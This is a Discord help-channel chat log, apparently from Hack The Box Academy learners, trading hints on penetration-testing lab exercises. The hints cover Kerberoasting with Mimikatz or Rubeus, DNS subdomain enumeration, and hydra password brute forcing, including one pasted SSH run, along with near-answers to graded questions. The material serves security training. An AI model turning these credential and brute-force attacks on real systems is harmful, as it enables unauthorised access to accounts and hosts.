You have a chisel set up, how did you manage that?
ACTIVE DIRECTORY ENUMERATION & ATTACKS -----> AD Enumeration & Attacks - Skills Assessment Part I
You can get domain creds; many tools you can use
Just because it's not a fully interactive shell doesn't mean some tools can't be run
Yes, but I mean, in this case, as I am as nt authority system on a computer attached to the domain, the privilege level I think I remember was the same as being a normal user of the domain, so that's why I could with powerview run the Kerberoasting no?
To kerberoasting from my Kali, I would need credentials of a domain user.
Either way. There's a tool you can use on the Web01 host
Mimikatz or rubeus
They both should work
Though with mimikatz you may need to pass the commands through as mimikatz "command" "exit"
So, this here is correct, right?
That was my question, I'm not sure if this is right or not.
I wouldn't suggest a pivot until after you have creds
Yes, but I mean, that's why I was able to perform kerberoasting, right? because of what I said above.
Yes and through pivoting.
Okay, of course, since I am on a computer joined to the domain as nt-authority system, I do not need credentials from a domain user, because I am a user with maximum privileges and that is why Kerberoasting can be applied, right?
I'm doing "Using CrackMapExec" with "NetExec" - does anybody know where the modules are stored when installing with pipx?
¯_(ツ)_/¯
But there is official instructions on installing netexec on their wiki and gh iirc
Try to repeat what you learned so far to find more files/directories. One of them should give you a flag. What is the content of the flag?
Yeah, I know, I mean I know where the modules should be, as they are in the /nxc folder in their repo, but can't find them after installing - and I don't find any documentation on it. 
birdman
<@&861185840277487616>
Okay sorry
lol
Recursion
Wrong place dude
Where can I apply?
Also you're in probably the worst channel for finding any "professionals"
Not to mention AI = instant L
Don't dm me
Thanks Marcie!
yup
can someone help me with this: Broken Authentication/Brute Forcing Passwords
Ok, found it...: ~/.nxc/modules 🙄
I never worried about it bc I never needed to go into the nxc modules folder ¯_(ツ)_/¯
Fair enough - I was just wondering, as they are talking about custom modules in the "Using CrackMapExec" module.
Although I found it, it's empty, lol.
Anyway, thanks.
Probably because it's for use with custom modules and default modules are loaded in a different section
Yeah, I think it's symlinked. 🤔
Is this module even hard or am i trippin
Oh damn, I didn't know it posted itself here, I didn't even remember pressing enter I was searching it here:
It helps of you say what you're struggling with instead of just "can anyone help"
Also repeating the question isn't helpful for getting answers lol
hello, i am on "getting started", under "privilege escalation". i am unable to download LinEnum.sh to my pwnbox using either wget or curl. wget and curl cannot connect to https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Do you mean the target lab?
The target labs don't have internet access
You'll need to first download it on your attack machine, then copy to target
Also generally with gh stuff you wanna do git clone <repo>
For free accounts: there's limited internet access on the in-browser pwnbox
ok, i thought the attack machine is the pwnbox that i can use for 2 hours a day on a free account. what is the target lab?
But steps are;
Download to attack box -> run a share service [i.e. python3 http.server module] -> the target
I am struggling with what to do after getting the wordlist how to brute force the password and bypass the rate limit
ok, i guess thats why git clone is also not working
Target lab is the 10.129.x.x or the public_ip:port that spawns after clicking 'click here to spawn target'
Git clone should work
it is not working
Iirc you can access git and some other websites on the in-browser vm [pwnbox]
Would be the github repo
Raw is literally raw code
If all else fails, go to the raw page -> ctrl+A -> ctrl+C -> in pwnbox open a text editor and paste
Then save, and follow the upload steps
Where did I send it twice X-X
I meant repeating the module question
Ah.
Why I can't use the general off topic channel?
I think verify your account first
.
Read and follow #welcome
So what part exactly do you need help with? the rate limit or the bruteforce bit?
Both
ok now, i am on the nibbles box here - https://app.hackthebox.com/machines/121.
i have spawned the target ip and started the pwnbox but i am getting WARNING: No targets were specified, so 0 hosts scanned. after scanning the target IP with nmap
BROKEN AUTHENTICATION | Brute Forcing Passwords: can someone help please?
yeah i am stuck here too this is tough one
yeah i am doing it 3 days
if u passed it can you give a hint
am already sorted all passwords
for sure
yeah bro how did you solved this?
SSH to 10.129.204.9 with user "user2" and password ""
whats the password supposed to be dude
i tried just pressing enter
i tried pressing space
whaaa
The previous answer
This is true for all questions in this section except the first ofc
yeah got it
thanks man
can you help me bro?
He hasn't completed it yet
yes
though for one of the questions you're best to be in a powershell session; and doing a recursive search. plenty of sources online to figure it out
ye im on user4 question
User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them.
so many flags.txt
how am i gonna check them all
recursion; only one of them has any content in it
Hi everyone, currently I’m at PASSWORD ATTACKS module
Password Mutations
Is it natural for password cracking to get slower and slower? It started from 14:38h and went to 110:56h
I waited more than one hour
yeah ofc
but not sure how im gonna search through all of them
is there a command for it?
i think i got it
there's a command in the cheatsheet which may be useful
oh thank you
at least to get you started with the powershell, you might need a bit more digging to be able to search for size
i believe -neq is a comparator in powershell for not equal
ill check it out
thanks for the help
sorry it's ne
-ne?
you can also use -gt for greater than zero
i didnt solve it yet but if u want help with anything else i can
i believe length of an item is Object.Length in powershell
so $_.length in the case of a recursive search with multiple items
and of course ? (or where-Object)
here's a list of common and default powershell aliases
as a lot of resources online will use the common aliases for items
i figured it out thanks
np i didn't really help, just put it in a script block so it's easier for others to parse
it is
well its not being recognized for some reason
How long does university enrollment take?
are you in cmd?
^
nah
i pressed on the powershell prompt through the workstation and
doesn't it automatically connect you to the PS prompt when you connect via your own vm?
if your shell prompt doesn't have PS in front, and you're in a Windows env, you're in CMD
yeah i get you
Hi. Quick question: If I buy a platinum subscription, do I instantly receive 1000 cubes?
to drop into powershell, just type powershell
looks like im not then
my bad xd
yes as soon as you purchase it
Thank you 🙂 So I dont have to earn the cubes? I just instantly receive them?
correct
Thanks!
then the following month around the same date; if you haven't unsubscribed, you get another 1k cubes
Amazing!
thank you
i was confused because i also pressed on the PS prompt through the HTB workstation and the command still wasn't being recognized
PS prompt in the PWNbox (in-browser vm) is not gonna be the same env as the one native to windows
there's a ps prompt in pwnbox?
yes it's next to the bash terminal
oh i see thanks again
yup, immediately
Hi, is here the right place to ask for a little hint for the JerryTok web challenge? Cannot find the challenges discord room 🙂
#challenges you'll need to read and follow #welcome to access it
Oh, okay, thanks
Query on mod: FILE TRANSFERS - Windows File Transfer Methods Q2:
"Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box".
Reading this seems like no RDP prior to the upload of the file yet the methodology from the room requires access to the machine via RDP to the target to download. Is this poorly worded or am I interpreting it incorrectly?
I noticed the mutated list is too big and has duplicates in it, how can I create a unique list without any duplicates?
Use the tasklist command to print running processes and then sort them in reverse order by name. The name of the process that begins with "vm" is the flag for this user.
i used
tasklist /svc | sort /R
i find 2 services that start with vm
vmtoolsd.exe (VMTools)
vm3dservice.exe (vm3dservice)
but none of those are correct
not sure what else to do now
oh shit wait wait
yeah nvm still need help
did you try the name?
yeah ive tried
VMTools
vmtoolsd
toolsd
tools
vm3dservice
3dservice
even with .exe
like everything
but its still wrong
the image name
yeah
im going through them again rn
nothing works
im most likely missing something
OH NVM
i thought i tried vmtoolsd.exe but i havent
my bad
thank you xd
Okay I am on Footprinting > DNS. Stuck on the last question. What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I have literally used every list within Seclist and n0kovo_subdomains
My command dnsenum --dnsserver 10.129.229.61 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb
Cannot find .203
The hint is Remember that different wordlists do not always have the same entries. which is totally what i have been doing
you may want to use a more fierce wordlist
this is being addressed, just RDP in then upload
I did!! Literally every list, so I am assuming i have to make adjustments to my dnsenum command
also: subdomains of subdomains
one of the already discovered subdomains will hold the key to 203
Okay thank you, i just wanted to make sure i am not being an idiot. I figured i might need to make some adjustments
the final answer will be subd1.subd2.inlanefreight.htb
my personal strategy was: generate a list of subdomains using a dig axfr query against inlanefreight.htb; then do a loop with the subdomains that amounts to something like dnsenum ... $subd.inlanefreight.htb | grep 203 ("..."is the set options)
that way if you have a list and let a computer iterate through it, surely you didn't miss the one subdomain
always the 0 point question which waste lot of time
any hint guys
Module: ATTACKING COMMON APPLICATIONS
Section: WordPress - Discovery & Enumeration
Question: Enumerate the host and find a flag.txt flag in an accessible directory.
i mean... it says it in the name, in an accessible directory - so it'll be in a directory you have access to
i believe error redirects work the same/similar in CMD/Powershell where you can redirect errors to an error.log file
man what do i do here
What user account on the Domain Controller has many Event ID (4625) logon failures generated in rapid succession, which is indicative of a password brute forcing attack? The flag is the name of the user account.
im not sure what to use
i tried Get-ADUser
but uhh yeah maybe something with that?
what would the filters be and all
are you connected to the domain controller? and two look up how to search event logs
ive found something about filterhashtables
and a weird @{LogName... command
imma try it out
fun fact the @{..} syntax is xml
considering that event logs are generated in xml, that's what it's drawing from
o good to know
LogName = the type of log; Security, Audit, Information, Critical
i thought it was something for me to edit and got hella confused when reading the cheat sheet
ID = the EventID #
4625 is the Security Event ID for logon failures
also the Domain-Controller is the same as the 172.16... one from an earlier question
How could I create unique list without any duplicate values ?
yes you have to connect to it the same way you did for user7
Is it okay to learn just networking on Hack The Box,
without Network+ and CCNA?
sort -u or uniq
oooh makes sense now
lemme try again
if you don't connect to the Domain Controller, you won't get the right answer
https://academy.hackthebox.com/module/158/section/1438
hello, i've got a problem: i don't understand why the rdp and ssh ports are closed, whereas i want to connect to rdp to find the flag.
I've set up my tunnel using the ptunnel-ng tool ...
user2
ACADEMY-ICL11
S-1-0-0
wrong
hm
the question is asking for the account with the highest count of consecutive logon failures to the DomainController
remember: key being there being logged into the DC
logon type is where i look at?
hm alright
oh btw i executed this
Get-WinEvent -MaxEvents 10 -FilterHashTable @{LogName='Security';ID='4625'} | fl
don't do -MaxEvents
I mean.. "max events"
ye stupid question
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/?view=powershell-7.4 this is a good resource for powershell commandlets to reference if you need more info on them
you can search by the cmdlet name and get the full doc info on it
o
Password Attacks Module, Password Mutations Section
Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer.
I created the mutation list and have more than hour trying to crack the password, how long should take ?
don't attack ssh
attack one of the other running services
should pop in ~30 minutes
I’m attacking ftp, is there any faster way to?
ssh is an EXTREMELY slow service to brute
using more threads
-t 48 is the most stable; default is 16 for hydra on ftp
I’m using -t 64
what size is your list (wc -l mutated_passwords.list)
brother just delete it
considering it's an answer
ye xd
94044
ok so it's the right size
ah not enough cubes for the next module
definitely scale back your threads
I have the impression that it wants to connect but it cuts out every time. Does anyone have any idea where this could come from?
what should i do now?
Make it -t 48?
yes
it looks like you closed your tunnel or something
maybe try resetting the target and trying again
sometimes these can be a bit funky
By the way, was the message that pixxelxd has deleted is the password ? Because it doesn’t exist in the list
i don't like ptunnel myself so i couldn't tell you what you did ¯_(ツ)_/¯
their message was unrelated
it was them working on their own module; the Intro to Windows Command Line module
Ok
i'd also scan the target to be sure it's still responsive
sometimes terminate then respawn the target makes it work instead of just "reset"
after 20 tries i was able to succeed, alleluia
I thought it was me who didn't understand the exercise
Good point
Could I just make hydra continue the list from where it stop instead of restarting?
You don't know if it's already past where the password is
This will take forever 🫠💔
The list too big and the cracking become slower and slower or just lost response and need to restart
I suggest changing vpn regions then
It also isn't taking longer the time is just being adjusted as it normalizes the response times
As sometimes response times are varied
I'm living in Saudi Arabia, unfortunately there's no server for us yet, nor for Bahrain 🫠💔
So I’m using UK or German depending on ms
Vpn server
It's different from the pwnbox server
And yes, it makes a difference
Hmmm am I using it wrong ? Please could explain you more
I mean the command is just hydra -l sam -P mutated_passwords.list ftp://ip -t 48
anyone knows why? INTRODUCTION TO MALWARE ANALYSIS I ran Powershell with administrator too
got it, reading previous comments on this problem, a simple solution is to close ProcMon before Ctrl+C and after executing the malware
HTB Academy - SOC Analyst | Windows Event Logs & Finding Evil | Windows Event Logs
I'm struggling a lot understanding this lesson in an attempt to even answer the questions. Would anyone be able to provide any clarity on the questions?
I am doing Hacking Wordpress module
when i try to go to 94.237.63.93:47842/wp-admin
it redirects to 94.237.63.93/wp-admin
anyone have solution?
which section
RCE via theme editor
based on my note, first step should be in ||/wp-login.php||
nice
@wide river visiting /wp-content also redirects
In directory indexing section
Alright I gave up on vpn and decided to do the task at pwnbox and seems hydra here more stable and speed doesn’t going down and down that hard
fascinating
that's the whole point of using pwnbox, it saves your time
i normally run nmap on it too
For real 😭 me too, I just don't want to rely on pwnbox too much before doing cpts 🫠
network when doing cpts is really good, dont worry about it
Guys I'm stuck at the GETTING STARTED module : knowledge check
I have enumerated my target and searched for possible exploits I can use on Metasploit, but every time I try to run the exploits I always get "no-access". I have checked the target website admin page and I don't see where to give access to the admin user. I did see something about the CMS website being an old version and I saw some clue that says to install the latest version. I even downloaded the latest version and tried to host it on my local server, but every time I visit my local server on the web, the installer package doesn't load to install, and idk how to directly install the new version on the target website. I'm stuck and don't know what to do.
Any clue or hint please???
can anyone help with the AD Trust Module ADCS section that I can private message? I can't post screenshots in this channel for some reason
Hi, I am having trouble compiling assembly code. I get this type of error on unedited resource files:
You don't need to download anything
Look at the versions of the existing plug-ins on the hosted server
That's all you need to move forward
One of them is, indeed, vulnerable
I don't recommend blindly throwing msf at it until you can narrow down versions and plugins
you can't do that module then
you will have to acquire more cubes or subscribe to a plan that gives you access to more modules
"i found a really weird bug where all modules Tier I and above are locked, please fix?"
🤔 Idk how to penetrate the vulnerable plugin, one of them says document-data-upload or something but it doesn't allow me to add a payload file
ill just hack the website dude (buy a subscription)
Keep solving available modules to gain enough cubes to access ur next interested module, they want you to work before you get what you want since you don't use ur money to purchase cubes
why cant i write in "general"?
verify i guess idk i dont remember how the server works
and if you cant find the channel just go to browse channels and yk
You don't ever go positive in cubes by doing modules
thanks
Read and follow #welcome
Unless ofc you have an annual or student sub, bc the modules provided by those subs still give you the cube rewards upon task completions
But tier 1+ modules only give you 20% of their cost back
Oh I've been accumulating cubes by using the few cubes I have to solve different modules so when I accumulate enough, I can get the desired module I want which is the cpts
Exactly!
The cost back is how you accumulate
You do if you complete all exercises in the module
Math...
Are you sure about that?🤔
Yes, I'm 100% sure
The only exceptions to that rule is the annual and student subs
Since those grant access to t0-2 modules at no cost
Well Idk about that but I know I always gain 1 or 2 more extra cubes by completing different exercises in a module
Well idk man, help me with my exercise please??
The knowledge check exercise?
All I can say is Google versions of the plug-ins you see installed
If there's an upload vuln then msf crafts the payload for you, otherwise you can research how it works
Iirc it has something to do with themes
🤔
I'll check, thanks for the help
hello all, i am doing password attacks. i try to bruteforce the ssh with the generated pass list from a custom rule and a pass list, but hydra and netexec are taking extremely much time, is it normal?
```
┌─[parrot@parrot]─[~/Desktop/modules/passattacks/2ndcube]
└──╼ $hydra -L list -P mut_pass.list ssh://10.129.122.249
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-07 18:03:20
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ssh://10.129.122.249:22/
[STATUS] 104.00 tries/min, 104 tries in 00:01h, 93943 to do in 15:04h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 93771 to do in 16:60h, 13 active
[STATUS] 82.00 tries/min, 574 tries in 00:07h, 93473 to do in 18:60h, 13 active
```
The only thing admin creds are used for is to check versions, that's it
Don't attack ssh
Also if you're doing the mutated passwords section: they give you a username
You know you can just do -l username right?
-l = single username
-L = username list
But also, don't attack ssh
i should bruteforce something else you mean
Don't make assumptions based off the questions, often questions will give you an end goal, but there's steps in between
please help
Looks like your code is missing instructions idk
I'm just reading what the error says
it's directly downloaded from resources and compiled using both the nasm and as assemblers
```nasm
global _start
section .text
_start:
    mov rax, 2
    mov rcx, 5
loop:
    imul rax, rax
```
this is the code
If you're wondering how to read it, file:n is such that n is the line number where the error lies

what do i do now